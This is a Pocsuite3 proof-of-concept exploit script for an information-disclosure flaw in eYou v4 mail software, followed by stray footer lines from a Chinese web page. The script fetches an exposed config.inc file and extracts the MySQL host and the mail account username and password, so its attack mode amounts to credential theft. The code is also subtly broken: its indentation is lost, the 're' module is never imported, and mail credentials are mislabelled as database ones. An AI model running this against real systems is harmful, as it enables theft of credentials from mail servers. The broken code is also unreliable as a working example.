"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit http://pocsuite.org
"""
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
from pocsuite3.lib.utils import random_str
from requests.exceptions import ReadTimeout
class DemoPOC(POCBase):
vulID = '1280' # ssvid
version = '1'
author = ['chenghs@knownsec.com']
vulDate = '2014-04-25'
createDate = '2014-05-12'
updateDate = '2014-05-12'
references = ['http://wooyun.org/bugs/wooyun-2014-058462']
name = 'eYou v4 /php/report/include/config.inc 信息泄露漏洞 POC'
appPowerLink = 'http://www.eyou.com//'
appName = 'eYou'
appVersion = 'v4#'
vulType = 'Information Disclosure'
desc = '''
eYou v4 /php/report/include/config.inc可绕过登陆验证进行用户管理等操作
'''
samples = []
install_requires = ['']
def _verify(self):
result = {}
url = self.url + '/php/report/include/config.inc'
content = requests.get(url).text
if re.search("define\(\s*'MYSQL_HOST',\s*\"[^\"]*\"\s*\);", content) and \
re.search("define\(\s*'MAIL_HOST',\s*\"[^\"]*\"\s*\);", content):
# 'Database': {'Hostname': 'xxx', 'Username': 'xxx', 'Password': 'xxx', 'DBname': 'xxx'},
result["Database"] = {
"Hostname":re.findall(
"define\(\s*'MYSQL_HOST',\s*\"([^\"]*)\"\s*\);", content)[0],
"Username":re.findall(
"define\(\s*'MAIL_USER',\s*\"([^\"]*)\"\s*\);", content)[0],
"Password":re.findall(
"define\(\s*'MAIL_PASS',\s*\"([^\"]*)\"\s*\);", content)[0]
}
return self.parse_output(result)
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
def _attack(self):
return self._verify()
register_poc(DemoPOC)
共 1 兑换了
京公网安备 11010502034610号
暂无评论